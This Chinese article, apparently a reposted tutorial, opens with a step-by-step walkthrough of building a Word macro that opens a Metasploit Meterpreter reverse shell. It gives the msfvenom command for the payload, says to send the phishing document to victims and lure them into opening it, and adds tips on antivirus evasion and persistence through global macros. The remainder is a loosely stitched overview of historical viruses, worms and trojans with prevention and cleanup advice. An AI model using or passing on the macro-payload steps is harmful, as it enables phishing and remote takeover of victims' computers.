#黑客##网络安全威胁##头条科技#
实验名称:
利用Office宏病毒反弹shell
病毒简介:
宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上,攻击者甚至可以利用在宏代码中写入反弹shell脚本,诱骗受害者打开带有宏病毒的office文档,实现对其主机的远程控制。
实现过程:
1.首先实验攻击者利用本地(172.16.0.55)的Metasploit工具生成payload文件,生成名为jaky.vba的文件.
命令如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.55 LPORT=6666 -f vba -o JAky.vba
2.我们可以先cat一下这个文件,看看这跟文件里面payload的内容。
3.也可以将这个文件放到网站根目录下面,通过网站的方式打开这个文件, 查看生成的payload
4.将vba代码录入宏中,我们可以先新建一个word文档。
5.打开word文档,默认情况下,宏是关闭的,进入信任中心,点击信任中心设置,手动开启一下。
6.开始设置宏内容:宏的名字可以任意命名,点击“创建”出现宏的编辑器。
7.将之前生成的宏病毒payload,复制到新创建的宏里面。
8.将文档保存另存为包含宏的文档类型,这里其实也可以直接保存的。
9.保存后退出,并通过各种方式向受害者发送此钓鱼文档,并引诱其打开。
10.在kali上面设置监听模式等待对方点击文档,然后反弹shell
11.执行监听,然后诱骗点击文档,就可以看到反弹过来的shell了,拿到用户权限。当文档关闭的时候,该工作组会被关闭,所以建议做进程迁移。
12.更加恶劣的是,当这个宏病毒一旦注入到目标主机时,后面不管用户新建或者打开什么word文档,都会被反弹连接上来。
实验拓展:
1.实验过程中,这种简单的shellcode,可能会被杀毒软件报毒。对shellcode部分可以尝试做一下免杀处理。
2.如果创建的是全局宏,Office会在这个目录生成一个dotm文档:
C:Users(username)AppDataRoamingMicrosoftTemplates
注:全局宏是对于当前计算机所有文档对象有效,即文档本身不包含宏代码,也可以运行全局宏。但是本身的全局宏名字是随机生成的,所以要先创建一个全局宏,定义一下名字。打开其他文档时才能调用并执行代码。
这个全局宏中的文件:vbaProject.bin是包含了特征的文件,但是反病毒软件不会扫描这个文件,除非主动查杀。这个特性可以达到维持权限的作用。
病毒以哪些方式入侵我们的电脑?
一、宏病毒由于微软的Office系列办公软件和Windows系统占了绝大多数的PC软件市场,加上Windows和Office提供了宏病毒编制和运行所必需的库(以 VB库为主)支持和传播机会,所以宏病毒是最容易编制和流传的病毒之一,很有代表性。
宏病毒发作方式: 在Word打开病毒文档时,宏会接管计算机,然后将自己感染到其他文档,或直接删除文件等等。Word将宏和其他样式储存在模板中,因此病毒总是把文档转换成模板再储存它们的宏。这样的结果是某些Word版本会强迫你将感染的文档储存在模板中。
判断是否被感染: 宏病毒一般在发作的时候没有特别的迹象,通常是会伪装成其他的对话框让你确认。在感染了宏病毒的机器上,会出现不能打印文件、Office文档无法保存或另存为等情况。
宏病毒带来的破坏:删除硬盘上的文件;将私人文件复制到公开场合;从硬盘上发送文件到指定的E-mail、FTP地址。
防范措施:平时最好不要几个人共用一个Office程序,要加载实时的病毒防护功能。病毒的变种可以附带在邮件的附件里,在用户打开邮件或预览邮件的时候执行,应该留意。一般的杀毒软件都可以清除宏病毒。
二、CIH病毒
CIH是本世纪最著名和最有破坏力的病毒之一,它是第一个能破坏硬件的病毒。
发作破坏方式:主要是通过篡改主板BIOS里的数据,造成电脑开机就黑屏,从而让用户无法进行任何数据抢救和杀毒的操作。CIH的变种能在网络上通过捆绑其他程序或是邮件附件传播,并且常常删除硬盘上的文件及破坏硬盘的分区表。所以CIH 发作以后,即使换了主板或其他电脑引导系统,如果没有正确的分区表备份,染毒的硬盘上特别是其C分区的数据挽回的机会很少。
防范措施:已经有很多CIH免疫程序诞生了,包括病毒制作者本人写的免疫程序。一般运行了免疫程序就可以不怕CIH了。如果已经中毒,但尚未发作,记得先备份硬盘分区表和引导区数据再进行查杀,以免杀毒失败造成硬盘无法自举。
三、蠕虫病毒
蠕虫病毒以尽量多复制自身(像虫子一样大量繁殖)而得名,多感染电脑和占用系统、网络资源,造成PC和服务器负荷过重而死机,并以使系统内数据混乱为主要的破坏方式。它不一定马上删除你的数据让你发现,比如著名的爱虫病毒和尼姆达病毒。关于蠕虫病毒的识别判断及防范措施将在下面的文章中详细介绍。
四、木马病毒
木马病毒源自古希腊特洛伊战争中著名的“木马计”而得名,顾名思义就是一种伪装潜伏的网络病毒,等待时机成熟就出来害人。
传染方式:通过电子邮件附件发出;捆绑在其他的程序中。
病毒特性:会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。
木马病毒的破坏性:木马病毒的发作要在用户的机器里运行客户端程序,一旦发作,就可设置后门,定时地发送该用户的隐私到木马程序指定的地址,一般同时内置可进入该用户电脑的端口,并可任意控制此计算机,进行文件删除、拷贝、改密码等非法操作。
防范措施:用户提高警惕,不下载和运行来历不明的程序,对于不明来历的邮件附件也不要随意打开。
电脑病毒用什么方式入侵到电脑中的?
jiayou恶性程序码的类别中,电脑病毒和蠕虫是较具破坏力,因为它们有复制的能力,从而能够感染远方的系统。电脑病毒一般可以分成下列各类:
1.引导区电脑病毒
2. 文件型电脑病毒
3. 复合型电脑病毒
4.宏病毒
5. 特洛伊/特洛伊木马
6.蠕虫
其他电脑病毒/恶性程序码的种类和制作技巧
引导区电脑病毒
1.引导区电脑病毒是如此传播:隐藏在磁盘内,在系统文件启动以前电脑病毒已驻留在内存内。这样一来,电脑病毒就可完全控制DOS中断功能,以便进行病毒传播和破坏活动。那些设计在DOS或Windows3.1上执行的引导区病毒是不能够在新的电脑操作系统上传播,所以这类的电脑病毒已经比较罕见了。 Michelangelo是一种引导区病毒。它会感染引导区内的磁盘及硬盘内的MBR。当此电脑病毒常驻内存时,便会感染所有读取中及没有写入保护的磁盘。除此以外,Michelangelo会于3月6日当天删除受感染电脑内的所有文件。
2.文件型电脑病毒,又称寄生病毒,通常感染执行文件(.EXE),但是也有些会感染其它可执行文件,如DLL,SCR等等...每次执行受感染的文件时,电脑病毒便会发作:电脑病毒会将自己复制到其他可执行文件,并且继续执行原有的程序,以免被用户所察觉。
CIH会感染Windows95/98的.EXE文件,并在每月的26号发作日进行严重破坏。于每月的26号当日,此电脑病毒会试图把一些随机资料覆写在系统的硬盘,令该硬盘无法读取原有资料。此外,这病毒又会试图破坏FlashBIOS内的资料。
3.宏病毒 与其他电脑病毒类型的分别是宏病毒是攻击数据文件而不是程序文件。
宏病毒专门针对特定的应用软件,可感染依附于某些应用软件内的宏指令,它可以很容易透过电子邮件附件、软盘、文件下载和群组软件等多种方式进行传播如MicrosoftWord和Excel。宏病毒采用程序语言撰写,例如VisualBasic或CorelDraw,而这些又是易于掌握的程序语言。宏病毒最先在1995年被发现,在不久后已成为最普遍的电脑病毒。 JulyKiller这个电脑病毒通过VB宏在MSWord97文件中传播。一但打开染毒文件,这病毒首先感染共用范本(normal.dot),从而导致其它被打开的文件一一遭到感染。此电脑病毒的破坏力严重。如果当月份是7月时,这病毒就会删除c:的所有文件。
4. 特洛伊或特洛伊木马是一个看似正当的程序,但事实上当执行时会进行一些恶性及不正当的活动。特洛伊可用作黑客工具去窃取用户的密码资料或破坏硬盘内的程序或数据。与电脑病毒的分别是特洛伊不会复制自己。它的传播技俩通常是诱骗电脑用户把特洛伊木马植入电脑内,例如通过电子邮件上的游戏附件等。 BackOrifice特洛伊木马于1998年发现,是一个Windows远程管理工具,让用户利用简单控制台或视窗应用程序,透过TCP/IP去远程遥控电脑。
5.蠕虫是另一种能自行复制和经由网络扩散的程序。它跟电脑病毒有些不同,电脑病毒通常会专注感染其它程序,但蠕虫是专注于利用网络去扩散。从定义上,电脑病毒和蠕虫是非不可并存的。随着互联网的普及,蠕虫利用电子邮件系统去复制,例如把自己隐藏于附件并于短时间内电子邮件予多个用户。有些蠕虫(如CodeRed),更会利用软件上的漏洞去扩散和进行破坏。 于1999年6月发现的Worm.ExploreZip是一个可复制自己的蠕虫。当执行时,它会把自己隐藏在附件,经电子邮件传送予通讯录内的收件人。在Windows环境下,若用户开启附件,就会自动执行蠕虫。在Windows95/98环境下,此蠕虫以Explore.exe为名,把自己复制到C:windowssystem目录,以及更改WIN.INI文件,以便系统每次启动时便会自动执行蠕虫。
预防篇
1. 提倡尊重知识产权的观念,支持使用合法原版的软件,拒绝使用翻版软件,只有这样才能确实降低使用者电脑发生中毒的机会.
2. 平日就要将重要的资料备份起来,毕竟解毒软体不能完全还原中毒的资料,只有靠自己的备份才是最重要的.
3. 建立一张紧急救援磁片,而且是「乾净及可开机的」,DOS的版本与硬碟相同,同时里面还要有以下程式:FDISK.EXE,FORMAT.COM,UNFORMAT.COM,SYS.COM,UNDELETE.EXE,SCANDISK.EXE,扫毒软体所备份的启动磁区及硬碟分割表档案.如果你有PCTOOLS或Norton Utility等软体,用它们来帮助你做一张紧急救援磁片,它们甚至可以还原CMOS资料,或是灾后重建资料.(别忘了贴上防写标签.)
4. 不要随便使用来历不明的档案或磁碟,就算要使用,先用扫毒软体扫一扫再用.
5. 准备一些好的防毒,扫毒,解毒软体,并且定期使用.
.建立正确病毒基本观念,了解病毒感染,发作的原理,亦可以提高个人的警惕.
治疗篇
请熟记以下的六字口诀:
1. 关(Step 1;关闭电源)
2. 开(Step 2;以乾净磁片开机)
3. 扫(Step 3;用防毒软体扫瞄病毒)
4. 除(Step 4;若侦测有病毒,则立即删除)
5. 救(Step 5;若侦测硬碟分割区或启动区有病毒时,可用"硬碟紧急救援磁片"救回资料,或用乾净DOS磁片中的FDISK指令,执行FDISK/MBR以救回硬碟分割区资料;另可在A槽中执行A>SYS C:(C为中毒磁碟)以救回资料;若不行就只有重新格式化硬碟了.
6. 防(Step 8;好了!您的电脑安全了.不过为了预防未来不再受到病毒之侵害,建议您经常更新你的防毒软件,以建立完善而且坚固的病毒防疫系统.
1、MSN小丑(MsnFunny),自动向用户的msn发送消息和病毒
2、Word文档杀手:破坏文档数据,记录管理员密码。
3、雏鹰(BBeagle):木马程序,电子邮件传播,监测系统时间,2004年2月25日则自动退出。
4、好大(Sobig):1分钟300封病毒邮件
5、红色代码(I-Worm Redcode):感染对象,服务器,修改服务器网站网页
6、蓝色代码(Bluecode):启动多个进程,系统运行速度非常慢,cpu占用率急速上升,甚至瘫痪
7、密码杀手2004:通过键盘记录技术截取几乎所有登录窗口的输入信息,通过电子邮件发送给病毒作者。
8、挪威客(Mydoom.e):疯狂发送带毒邮件,随机删除计算机数据。
9、网络天空(Netsky):带毒邮件大量传播,消耗网络资源,影响企业的邮件服务器
10、证券大盗(PSW.Soufan):特洛伊木马,盗取多家证券交易系统的交易账户和密码。记录键盘信息的同时通过屏幕快照将用户资料已图片形式发送。